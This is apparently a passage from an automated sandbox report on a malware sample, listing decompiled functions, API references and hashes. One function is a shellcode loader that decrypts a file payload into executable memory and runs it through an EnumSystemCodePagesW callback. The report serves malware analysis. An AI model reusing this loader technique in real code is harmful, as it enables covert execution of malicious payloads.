										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E00B52752(_t98, _t119, _t119); // executed
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E00B51530(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E00B51CC3())) = 0x22;
												L4:
												E00B51E89();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E00B52873(_t119)); // executed
											_t88 = E00B52A2A(); // executed
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00B52897(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E00B51CC3())) = 0x16;
				goto L4;
			}

0x00b512c8
0x00b512cb
0x00b512d1
0x00b512d4
0x00b512d7
0x00b512f4
0x00000000
0x00b512f4
0x00b512d9
0x00b512de
0x00000000
0x00000000
0x00b512e2
0x00b512fd
0x00b51300
0x00b51302
0x00b51310
0x00b51310
0x00b51314
0x00b5131c
0x00b51321
0x00b51321
0x00b51324
0x00b51326
0x00000000
0x00b51328
0x00b51328
0x00b51330
0x00b51332
0x00000000
0x00000000
0x00b51334
0x00b51337
0x00b5133a
0x00b51341
0x00b51343
0x00b5134a
0x00b51345
0x00b51345
0x00b51345
0x00b5134f
0x00b51352
0x00b51354
0x00b5143d
0x00000000
0x00b5135a
0x00b5135a
0x00b5135a
0x00b51361
0x00b513a2
0x00b513a2
0x00b513a4
0x00b5140f
0x00b51415
0x00b51418
0x00b5146f
0x00000000
0x00b51475
0x00b5141a
0x00b5141d
0x00b5141f
0x00b51445
0x00b51445
0x00b51449
0x00b51453
0x00b51458
0x00b51460
0x00b512ef
0x00b512ef
0x00000000
0x00b512ef
0x00b51421
0x00b51424
0x00b51427
0x00b51428
0x00b5142b
0x00b5142b
0x00b5142c
0x00b5142f
0x00b51432
0x00000000
0x00b51432
0x00b513a6
0x00b513a8
0x00b513cc
0x00b513d1
0x00b513d7
0x00b513d9
0x00b513d9
0x00b513aa
0x00b513ac
0x00b513b2
0x00b513c4
0x00b513c4
0x00b513c4
0x00b513c6
0x00b513b4
0x00b513b9
0x00b513bb
0x00b513bb
0x00b513c8
0x00b513c8
0x00b513db
0x00b513de
0x00000000
0x00b513e0
0x00b513e0
0x00b513e1
0x00b513eb
0x00b513ec
0x00b513f1
0x00b513f4
0x00b513f6
0x00b5147d
0x00000000
0x00b5147d
0x00b513fc
0x00b513ff
0x00b5146b
0x00b5146b
0x00b5146b
0x00b5146b
0x00000000
0x00b5146b
0x00b51401
0x00b51401
0x00b51403
0x00b51403
0x00b51406
0x00b51409
0x00000000
0x00b51409
0x00b513de
0x00b51363
0x00b51366
0x00b51369
0x00b5136b
0x00000000
0x00000000
0x00b5136d
0x00000000
0x00000000
0x00b51373
0x00b51375
0x00b51377
0x00b51379
0x00b51379
0x00b5137c
0x00b5137f
0x00b51381
0x00000000
0x00b51387
0x00b5138e
0x00b51393
0x00b51396
0x00b51399
0x00b5139c
0x00b5139e
0x00000000
0x00b5139e
0x00b51435
0x00b51435
0x00b51435
0x00000000
0x00b5135a
0x00b51354
0x00b51326
0x00b51309
0x00b5130c
0x00b5130e
0x00000000
0x00000000
0x00000000
0x00b5130e
0x00b512e4
0x00b512e9
0x00000000

APIs

_memset.LIBCMT ref: 00B5131C
_memcpy_s.LIBCMT ref: 00B5138E
__read_nolock.LIBCMT ref: 00B513EC
__filbuf.LIBCMT ref: 00B5140F
_memset.LIBCMT ref: 00B51453

Part of subcall function 00B51CC3: __getptd_noexit.LIBCMT ref: 00B51CC3

Memory Dump Source

Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 8dff333eff32fbcb5d7ca045d19a5a5e2e1b0a961703b03a2e899086fe8ef1a3
Instruction ID: 344614066f7f4b830ea4558ea7495ac11c76555f446b444b512b197da8e050da
Opcode Fuzzy Hash: 8dff333eff32fbcb5d7ca045d19a5a5e2e1b0a961703b03a2e899086fe8ef1a3
Instruction Fuzzy Hash: 8151C030A00205ABDB249FAD88907AE77E5EF40322F248FE9EC25966D0D7B19D598F44

Uniqueness

Uniqueness Score: -1.00%

Function 00B51000 Relevance: 7.6, APIs: 5, Instructions: 57
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00B51000(void* __ecx, void* __eflags, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				intOrPtr _t6;
				void* _t7;
				_Unknown_base(*)()* _t8;
				void* _t21;
				_Unknown_base(*)()* _t22;
				void* _t27;
				void* _t28;
				void* _t29;
				intOrPtr* _t35;

				_push(_t21);
				_t29 = 0; // executed
				_t6 = E00B5114D(_t21, _t27, 0, 0x17d78400); // executed
				 *_t35 = 0xb63000;
				_v8 = _t6;
				_t7 = E00B511DF(_a12, _t28); // executed
				_t8 = VirtualAlloc(0, 0x152a, 0x3000, 0x40); // executed
				_t22 = _t8;
				E00B51483(_t22, 0x152a, 1, _t7); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					E00B51530(_t10, 0xcb, 0x17d78400);
					do {
						 *(_t22 + _t29) = ((( *(_t22 + _t29) ^ 0x00000050) + 0x0000004d ^ 0x0000008d) + 0x00000001 ^ 0x0000007c) - 0x27;
						_t29 = _t29 + 1;
					} while (_t29 < 0x152a);
					EnumSystemCodePagesW(_t22, 0); // executed
				}
				return 0;
			}

0x00b51004
0x00b5100c
0x00b5100e
0x00b51013
0x00b5101d
0x00b51020
0x00b51036
0x00b51044
0x00b51048
0x00b5104d
0x00b51055
0x00b51062
0x00b5106a
0x00b51079
0x00b5107c
0x00b5107d
0x00b51084
0x00b51084
0x00b51090

APIs

_malloc.LIBCMT ref: 00B5100E

Part of subcall function 00B5114D: __FF_MSGBANNER.LIBCMT ref: 00B51164
Part of subcall function 00B5114D: __NMSG_WRITE.LIBCMT ref: 00B5116B
Part of subcall function 00B5114D: RtlAllocateHeap.NTDLL(00510000,00000000,00000001,00000000,00000000,00000000,?,00B548C7,00000000,00000000,00000000,00000000,?,00B544F9,00000018,00B62280), ref: 00B51190

Part of subcall function 00B511DF: __wfsopen.LIBCMT ref: 00B511EA

VirtualAlloc.KERNELBASE(00000000,0000152A,00003000,00000040), ref: 00B51036
__fread_nolock.LIBCMT ref: 00B51048
_memset.LIBCMT ref: 00B51062
EnumSystemCodePagesW.KERNELBASE(00000000,00000000), ref: 00B51084

Memory Dump Source

Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd

Similarity

API ID: AllocAllocateCodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
String ID:
API String ID: 3693343133-0
Opcode ID: 9770f18853a331a3fd2f9763fdb61f6c31d32c871e34689a1833ab97c91ebfa1
Instruction ID: 40c8b138034f0c7adee4a2c091c225e5f2aa086c7b907f89960a9c1c45c7bd46
Opcode Fuzzy Hash: 9770f18853a331a3fd2f9763fdb61f6c31d32c871e34689a1833ab97c91ebfa1
Instruction Fuzzy Hash: 7401FC72504344BBEB102B79AC4BF9B3BD8DB51756F1418D1FD056B1C2E6B499064274

Uniqueness

Uniqueness Score: -1.00%

Function 00111261 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 001113A5

Strings

D, xrefs: 0011132E

Memory Dump Source

Source File: 00000005.00000002.972498932.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_110000_idcqz.jbxd

Similarity

API ID: CreateProcess
String ID: D
API String ID: 963392458-2746444292
Opcode ID: 8c4a45f37e14942ff15c9878dca4783f39f837971a5654e3cb4f8d802ca8c15f
Instruction ID: 3e6dd8cd392a1293cf6a4acdf79544c36bdf5196c766f347fa0a58c2e699d413
Opcode Fuzzy Hash: 8c4a45f37e14942ff15c9878dca4783f39f837971a5654e3cb4f8d802ca8c15f
Instruction Fuzzy Hash: C7A1E271E04109EFDF99DBA4C981BEDBBB5BF48304F204065E616EB251D770AA81DF10

Uniqueness

Uniqueness Score: -1.00%

Function 00B5149E Relevance: 3.0, APIs: 2, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E00B5149E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				intOrPtr _t19;
				intOrPtr _t29;
				void* _t32;

				_push(0xc);
				_push(0xb62170);
				E00B52400(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
					L6:
					_t16 = 0;
				} else {
					_t31 =  *((intOrPtr*)(_t32 + 0x18));
					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
						E00B51F5E(_t31);
						 *((intOrPtr*)(_t32 - 4)) = 0;
						_t19 = E00B512BE( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
						_t29 = _t19;
						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
						E00B51527(_t31);
						_t16 = _t29;
					} else {
						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
							E00B51530( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
						}
						 *((intOrPtr*)(E00B51CC3())) = 0x16;
						E00B51E89();
						goto L6;
					}
				}
				return E00B52445(_t16);
			}

0x00b5149e
0x00b514a0
0x00b514a5
0x00b514ac
0x00b514b2
0x00b514e5
0x00b514e5
0x00b514b9
0x00b514b9
0x00b514be
0x00b514ee
0x00b514f4
0x00b51504
0x00b5150c
0x00b5150e
0x00b51511
0x00b51518
0x00b5151d
0x00b514c0
0x00b514c4
0x00b514cd
0x00b514d2
0x00b514da
0x00b514e0
0x00000000
0x00b514e0
0x00b514be
0x00b514ec

APIs

_memset.LIBCMT ref: 00B514CD
__lock_file.LIBCMT ref: 00B514EE

Memory Dump Source

Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 206e60469a7bc96c2dea8f195b0ea8930146b8661a4298824820e64e5825f1ea
Instruction ID: 54c1a3732dc12712bc99fce4bf8c7fcefb2a4198813d408f0f512f2e4551b7ff
Opcode Fuzzy Hash: 206e60469a7bc96c2dea8f195b0ea8930146b8661a4298824820e64e5825f1ea
Instruction Fuzzy Hash: 6101D431800204ABCF21EFAC9C01B9E7BF1EF85322F008AD5FC241A261D7318A59DF92

Uniqueness

Uniqueness Score: -1.00%

Function 00B511DF Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00B511DF(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E00B511F4(_t4, _t5, _t6, _t9); // executed
				return _t3;
			}

0x00b511e2
0x00b511e4
0x00b511e7
0x00b511ea
0x00b511f3

APIs

__wfsopen.LIBCMT ref: 00B511EA

Memory Dump Source

Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 081ec192a924cc1ac00fb16a88bde8ad02f8025a162b80c406cfb82a9ae70646
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 68B0927244020C77DE012A8AEC02B897B599B40660F0080A0FF0C28571A673AA649699

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B543CC Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00B543CC(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}

0x00b543d1
0x00b543e1

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00B543D1
UnhandledExceptionFilter.KERNEL32(?), ref: 00B543DA

Memory Dump Source

Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e7a3252643128019a50aca0a052bb28e6c233f2962dcd6aac3ad3b4ede10b277
Instruction ID: 2886200b257b0aa7ab69cd6f45fd636f354c4f80a50a5cc04274f0bf461691e1
Opcode Fuzzy Hash: e7a3252643128019a50aca0a052bb28e6c233f2962dcd6aac3ad3b4ede10b277
Instruction Fuzzy Hash: D0B09235044708ABCB062FA1EC0EB483F28EB14653F000490F61D560609F72A6108A92

Uniqueness

Uniqueness Score: -1.00%

Function 00B5439B Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B5439B(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}

0x00b543a8

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00B543A1

Memory Dump Source

Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e11ba79da464787d1b6136316f70875f5ed1571546b06a10acfadb30186c9417
Instruction ID: bed5a01004ceb481d2bfeaf91b097ff938dde1c4fb2af83d690df91b412bff55
Opcode Fuzzy Hash: e11ba79da464787d1b6136316f70875f5ed1571546b06a10acfadb30186c9417
Instruction Fuzzy Hash: 86A0113000020CAB8A022B82EC0A8883F2CEA002A2B0000A0F80C020208B32AA208A82

Uniqueness

Uniqueness Score: -1.00%

Function 00110A56 Relevance: .4, Instructions: 381COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.972498932.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_110000_idcqz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9596094dde73d7e1e650b9309008b19dd97b62653e2470f374a79ae706046c62
Instruction ID: f5806d8ee53088f4cdcbbc862930fd96f2c308bca7cb7617ce78d9b3fb3445e5
Opcode Fuzzy Hash: 9596094dde73d7e1e650b9309008b19dd97b62653e2470f374a79ae706046c62
Instruction Fuzzy Hash: C702F114C5D2E8ADDB06CBF944607FDBFB05D2A102F4845CAE0E5E6283C53A938EDB25

Uniqueness

Uniqueness Score: -1.00%

Function 00B538A8 Relevance: 12.2, APIs: 8, Instructions: 229
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00B538A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				intOrPtr _t129;
				signed int _t133;
				void* _t135;
				signed int _t138;
				void** _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t147;
				signed int _t149;
				void* _t150;
				signed int _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0xb62260);
				E00B52400(__ebx, __edi, __esi);
				E00B5442F(0xb);
				 *((intOrPtr*)(_t155 - 4)) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141);
				_t82 = E00B54869();
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					 *0xb64848 = _t82;
					 *0xb650e4 = _t141;
					while(1) {
						__eflags = _t133 - 0x800 + _t82;
						if(_t133 >= 0x800 + _t82) {
							break;
						}
						 *((short*)(_t133 + 4)) = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						 *((intOrPtr*)(_t133 + 8)) = 0;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
						 *((short*)(_t133 + 0x25)) = 0xa0a;
						 *((intOrPtr*)(_t133 + 0x38)) = 0;
						 *((char*)(_t133 + 0x34)) = 0;
						_t133 = _t133 + 0x40;
						 *(_t155 - 0x24) = _t133;
						_t82 =  *0xb64848; // 0x53f230
					}
					GetStartupInfoW(_t155 - 0x74);
					__eflags =  *((short*)(_t155 - 0x42));
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						__eflags = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							__eflags = _t142 - 3;
							if(_t142 >= 3) {
								break;
							}
							_t147 = (_t142 << 6) +  *0xb64848;
							 *(_t155 - 0x24) = _t147;
							__eflags =  *_t147 - 0xffffffff;
							if( *_t147 == 0xffffffff) {
								L33:
								 *(_t147 + 4) = 0x81;
								__eflags = _t142;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
									__eflags = _t90;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
								__eflags = _t91 - 0xffffffff;
								if(_t91 == 0xffffffff) {
									L45:
									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0xb66100;
									__eflags = _t94;
									if(_t94 != 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
									}
									goto L47;
								} else {
									__eflags = _t91;
									if(_t91 == 0) {
										goto L45;
									}
									_t98 = GetFileType(_t91);
									__eflags = _t98;
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									__eflags = _t99 - 2;
									if(_t99 != 2) {
										__eflags = _t99 - 3;
										if(_t99 != 3) {
											L44:
											_t71 = _t147 + 0xc; // -11946044
											E00B540A2(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
											L47:
											_t142 = _t142 + 1;
											continue;
										}
										_t103 =  *(_t147 + 4) | 0x00000008;
										__eflags = _t103;
										L43:
										 *(_t147 + 4) = _t103;
										goto L44;
									}
									_t103 =  *(_t147 + 4) | 0x00000040;
									goto L43;
								}
							}
							__eflags =  *_t147 - _t129;
							if( *_t147 == _t129) {
								goto L33;
							}
							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
							goto L47;
						}
						 *((intOrPtr*)(_t155 - 4)) = _t129;
						E00B53B53();
						_t86 = 0;
						__eflags = 0;
						L49:
						return E00B52445(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					__eflags = _t105;
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 = _t105 + 4;
					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					__eflags = _t135 - 0x800;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					__eflags = 1;
					 *(_t155 - 0x30) = 1;
					while(1) {
						__eflags =  *0xb650e4 - _t135; // 0x20
						if(__eflags >= 0) {
							break;
						}
						_t138 = E00B54869(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						__eflags = _t138;
						if(_t138 != 0) {
							0xb64848[_t149] = _t138;
							 *0xb650e4 =  *0xb650e4 + _t141;
							__eflags =  *0xb650e4;
							while(1) {
								__eflags = _t138 - 0x800 + 0xb64848[_t149];
								if(_t138 >= 0x800 + 0xb64848[_t149]) {
									break;
								}
								 *((short*)(_t138 + 4)) = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								 *((intOrPtr*)(_t138 + 8)) = 0;
								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
								 *((short*)(_t138 + 0x25)) = 0xa0a;
								 *((intOrPtr*)(_t138 + 0x38)) = 0;
								 *((char*)(_t138 + 0x34)) = 0;
								_t138 = _t138 + 0x40;
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0xb650e4; // 0x20
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *((intOrPtr*)(_t155 - 0x28));
					_t139 =  *(_t155 - 0x20);
					while(1) {
						__eflags = _t143 - _t135;
						if(_t143 >= _t135) {
							goto L28;
						}
						_t150 =  *_t139;
						__eflags = _t150 - 0xffffffff;
						if(_t150 == 0xffffffff) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						}
						__eflags = _t150 - _t129;
						if(_t150 == _t129) {
							goto L22;
						}
						_t111 =  *_t109;
						__eflags = _t111 & 0x00000001;
						if((_t111 & 0x00000001) == 0) {
							goto L22;
						}
						__eflags = _t111 & 0x00000008;
						if((_t111 & 0x00000008) != 0) {
							L20:
							_t154 = ((_t143 & 0x0000001f) << 6) + 0xb64848[_t143 >> 5];
							 *(_t155 - 0x24) = _t154;
							 *_t154 =  *_t139;
							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
							_t37 = _t154 + 0xc; // 0xd
							E00B540A2(_t37, 0xfa0, 0);
							_t156 = _t156 + 0xc;
							_t38 = _t154 + 8;
							 *_t38 =  *(_t154 + 8) + 1;
							__eflags =  *_t38;
							_t139 =  *(_t155 - 0x20);
							L21:
							_t135 =  *(_t155 - 0x1c);
							goto L22;
						}
						_t119 = GetFileType(_t150);
						_t139 =  *(_t155 - 0x20);
						__eflags = _t119;
						if(_t119 == 0) {
							goto L21;
						}
						goto L20;
					}
					goto L28;
				}
				_t86 = E00B52600(_t155, 0xb63400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}

0x00b538a8
0x00b538aa
0x00b538af
0x00b538b6
0x00b538be
0x00b538c1
0x00b538c5
0x00b538c6
0x00b538c7
0x00b538ce
0x00b538d0
0x00b538d5
0x00b538f2
0x00b538f7
0x00b538fd
0x00b53902
0x00b53904
0x00000000
0x00000000
0x00b53906
0x00b5390c
0x00b5390f
0x00b53912
0x00b5391b
0x00b5391e
0x00b53924
0x00b53927
0x00b5392a
0x00b5392d
0x00b53930
0x00b53930
0x00b5393b
0x00b53941
0x00b53946
0x00b53a7b
0x00b53a7d
0x00b53a7e
0x00b53a7e
0x00b53a7e
0x00b53a80
0x00b53a80
0x00b53a83
0x00b53a86
0x00000000
0x00000000
0x00b53a91
0x00b53a97
0x00b53a9a
0x00b53a9d
0x00b53ab1
0x00b53ab1
0x00b53ab5
0x00b53ab7
0x00b53abe
0x00b53ac3
0x00b53ac5
0x00b53ac5
0x00b53ab9
0x00b53abb
0x00b53abb
0x00b53ac9
0x00b53acf
0x00b53ad2
0x00b53ad5
0x00b53b23
0x00b53b29
0x00b53b2c
0x00b53b2e
0x00b53b33
0x00b53b35
0x00b53b3a
